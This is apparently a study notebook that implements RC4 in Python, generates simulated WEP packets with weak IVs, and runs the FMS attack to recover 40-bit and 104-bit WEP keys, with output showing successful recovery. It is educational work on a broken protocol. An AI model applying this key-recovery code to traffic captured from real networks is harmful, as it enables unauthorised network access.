In [15]:
# Initialise the State Array
def initS():
    S = []
    for i in range(256):
        S.append(i)
    return S

# Key Scheduling Algorithm (KSA) for key that is a string
# keySTR is the actual string
def ksa(keySTR):
    S = initS()
    j = 0
    for i in range(256):
        #ord returns unicode code (an integer) from a given character
        #eg. character ord('a') will return 97
        j = (j + S[i] + ord(keySTR[i % len(keySTR)])) % 256 
        S[i] , S[j] = S[j] , S[i]
    return S

# KSA for key which is already a list of bytes in integer form
def ksaByte(keyByte):
    S = initS()
    j = 0
    for i in range(256):
        j = (j + S[i] + keyByte[i % len(keyByte)]) % 256
        S[i] , S[j] = S[j] , S[i]
    return S


# Pseudo Random Generator Algorithm (PRGA) for full text length of keystream
def prga(text, S):
    i = 0
    j = 0
    check = []
    keyStream = ""
    #have to generate a key stream as long as the text to be encrypted or decrypted
    for _ in range(len(text)):
        i = (i + 1) % 256 
        j = (j + S[i]) % 256
        S[i] , S[j] = S[j] , S[i]
        keystreamByte = S[(S[i] + S[j]) % 256]
        check.append(keystreamByte)
        keyStream += chr(keystreamByte) #chr return convert the integer back to character
    print(check)
    print(len(check))
    return keyStream

# Pseudo Random Generator Algorithm (PRGA) for one byte
def prgaByte(S):
    i = 0
    j = 0
    i = (i + 1) % 256 
    j = (j + S[i]) % 256
    S[i] , S[j] = S[j] , S[i]
    keystreamByte = S[(S[i] + S[j]) % 256]
    return keystreamByte


In [16]:
# Enter your key and plaintext
key = "12ab34cd45ef"
plaintext = "This is a plaintext."
encryption_keyStream = ""
encrypted_plainText = ""
decryption_keyStream = ""
decrypted_plainText = ""

#Encryption
S = ksa(key)
encryption_keyStream = prga(plaintext, S)
for i in range(len(plaintext)):
    encrypted_plainText += chr(ord(plaintext[i]) ^ ord(encryption_keyStream[i]))
print("encrypted plaintext: "  +encrypted_plainText)

#Decryption
S = ksa(key)
decryption_keyStream = prga(encrypted_plainText, S)
for i in range(len(encrypted_plainText)):
    decrypted_plainText += chr(ord(encrypted_plainText[i]) ^ ord(decryption_keyStream[i]))
print("decrypted ciphertext: " + decrypted_plainText)

#Correctness Check
if(decrypted_plainText == plaintext):
    print("ARC4 implementation successful")
else:
    print("Something when wrong, decrypted plaintext not equals to plaintext")

[44, 120, 129, 98, 210, 106, 251, 21, 214, 76, 36, 182, 102, 181, 223, 167, 175, 141, 5, 165]
20
encrypted plaintext: xèò5·lTÚÜ±ÓÊõq
[44, 120, 129, 98, 210, 106, 251, 21, 214, 76, 36, 182, 102, 181, 223, 167, 175, 141, 5, 165]
20
decrypted ciphertext: This is a plaintext.
ARC4 implementation successful


# Generating Sample Packets of WEP Snap Headers

In [28]:
import os
import pandas as pd

def generatePackets(WEP_Key_Hex, numBytes):

    # If sample packets file exists, clear the file
    if os.path.isfile("WEP_Sample_Packets" + str(numBytes) + ".csv"):
        WEPSample = open("WEP_Sample_Packets" + str(numBytes) + ".csv", "w").close()

    # Open sample packets file to append generated packets
    WEPSample = open("WEP_Sample_Packets" + str(numBytes) + ".csv", "a")

    WEP_Key_Bytes = []
    i = 0

    # Converting the original 10 Hex Codes to 5 Bytes Key in Integer form
    while i < len(WEP_Key_Hex):
        keyByte = int(WEP_Key_Hex[i] + WEP_Key_Hex[i+1], 16)
        WEP_Key_Bytes.append(keyByte) 
        i += 2

    # Initial IV form
    IV = [3, 255, 0]
    sessionKey = IV + WEP_Key_Bytes
    SNAPheader = "aa"

    # Iterating through length of key
    for A in range(len(WEP_Key_Bytes)):
        # Increase IV's first byte from 0 to length of key
        # First Byte has to be minimum 3 to have the weak IV form
        IV[0] = A + 3

        # Iterating IV third byte from 0
        for i in range(256):
            IV[2] = i
            sessionKey = IV + WEP_Key_Bytes

            stateArr = ksaByte(sessionKey)
            keyStreamByte = prgaByte(stateArr)

            # Encrypt SNAPheader with keyStreamByte
            cipherByte = int(SNAPheader, 16) ^ keyStreamByte
            WEPSample.write(str(IV[0]) + "," + str(IV[1]) + "," + str(IV[2]) + "," + str(cipherByte) + "\n")
    print("WEP_Sample_Packets" + str(numBytes) + ".csv is generated sucessfully.")

    WEPSample.close()
    
    data = pd.read_csv("WEP_Sample_Packets" + str(numBytes) + ".csv")
    print(data)

# Key Recovery with FMS Attack

In [24]:
def FMSattack(fileName, length):

    simulatedPackets = pd.read_csv(fileName)
    rows = simulatedPackets.to_numpy()
    SNAPheader = "aa"

    # 40 bits WEP key, 5 ASCII Character/ Bytes, 10 Hexadecimal Code
    keyLength = int(length/8)
    print("IV is 24 bits / 3 Bytes")
    print("Key Length is " + str(length) + " bits / " + str(length/8) + " Bytes")
    print("Decrypted Pre-Shared Key: ", end="")

    WEP_key = [0, 0, 0]

    # This for loop recovers each byte of the key
    # A is the index of the current byte of key 
    for A in range(keyLength):
        # Initialize occurrence array to 0
        # 1 Byte has 256 possibilities
        occurrenceArr = [0] * 256

        # Looping through the simulated packets
        for row in rows:
            # reproduce the first 3 columns of simulated packets
            WEP_key[0] = int(row[0])
            WEP_key[1] = int(row[1])
            WEP_key[2] = int(row[2])

            # Perform KSA
            j = 0
            stateArr = initS()
            # Simulate the S-Box after KSA initialization.
            # For loop for each byte of the key
            for i in range(A + 3):
                j = (j + stateArr[i] + WEP_key[i]) % 256
                temp = stateArr[i]
                stateArr[i] = stateArr[j]
                stateArr[j] = temp

            i = A + 3
            # If the first element of the state array matches the key position to be checked,
            # Due to the weak IV allowing for unchanged state after i iterations
            if stateArr[0] == A + 3:
                # XOR the known SNAPheader('AA') with the encrypted 'AA' to get the corresponding byte in keystream
                keyStreamByte = int(row[3]) ^ int(SNAPheader, 16)
                # Retrieve key byte through undoing PGRA
                keyByte = (keyStreamByte - j - stateArr[i]) % 256
                # Increment occurence of key appearing
                occurrenceArr[keyByte] += 1

        # Assume that the most occurence is the byte[A] of pre-shared key
        highestProbability = occurrenceArr.index(max(occurrenceArr))
        WEP_key.append(highestProbability)

    # Get rid of first 24-bit/3 Bytes initialization vector.
    hexform = [format(byte, 'x') for byte in WEP_key[3:]]
    Key_Hex = ''.join(hexform)
    print(Key_Hex)

# Running FMS attack on generated packets

In [29]:
# Weak IV Form, 3 Bytes, 24 Bits
IV = [3, 255, 0]
# In increment

# 40 bits WEP key, 5 ASCII Character, 10 Hexadecimal Code
WEP_Key_Hex_40 = "A1C24D3CE2"

# 104 bits WEP key, 13 ASCII Character, 26 Hexadecimal Code
WEP_Key_Hex_104 = "F9D8C5497AEEFBA4B73B694AE3"
    
generatePackets(WEP_Key_Hex_40, 40)
generatePackets(WEP_Key_Hex_104, 104)

WEP_Sample_Packets40.csv is generated sucessfully.
      3  255    0  212
0     3  255    1   21
1     3  255    2  169
2     3  255    3  227
3     3  255    4  113
4     3  255    5  255
...  ..  ...  ...  ...
1274  7  255  251  238
1275  7  255  252   14
1276  7  255  253   44
1277  7  255  254  240
1278  7  255  255  121

[1279 rows x 4 columns]
WEP_Sample_Packets104.csv is generated sucessfully.
       3  255    0  250
0      3  255    1   42
1      3  255    2   83
2      3  255    3  169
3      3  255    4  214
4      3  255    5  204
...   ..  ...  ...  ...
3322  15  255  251  146
3323  15  255  252  120
3324  15  255  253  219
3325  15  255  254  105
3326  15  255  255  126

[3327 rows x 4 columns]


In [30]:
FMSattack("WEP_Sample_Packets40.csv", 40)

print()

FMSattack("WEP_Sample_Packets104.csv", 104)

IV is 24 bits / 3 Bytes
Key Length is 40 bits / 5.0 Bytes
Decrypted Pre-Shared Key: a1c24d3ce2

IV is 24 bits / 3 Bytes
Key Length is 104 bits / 13.0 Bytes
Decrypted Pre-Shared Key: f9d8c5497aeefba4b73b694ae3
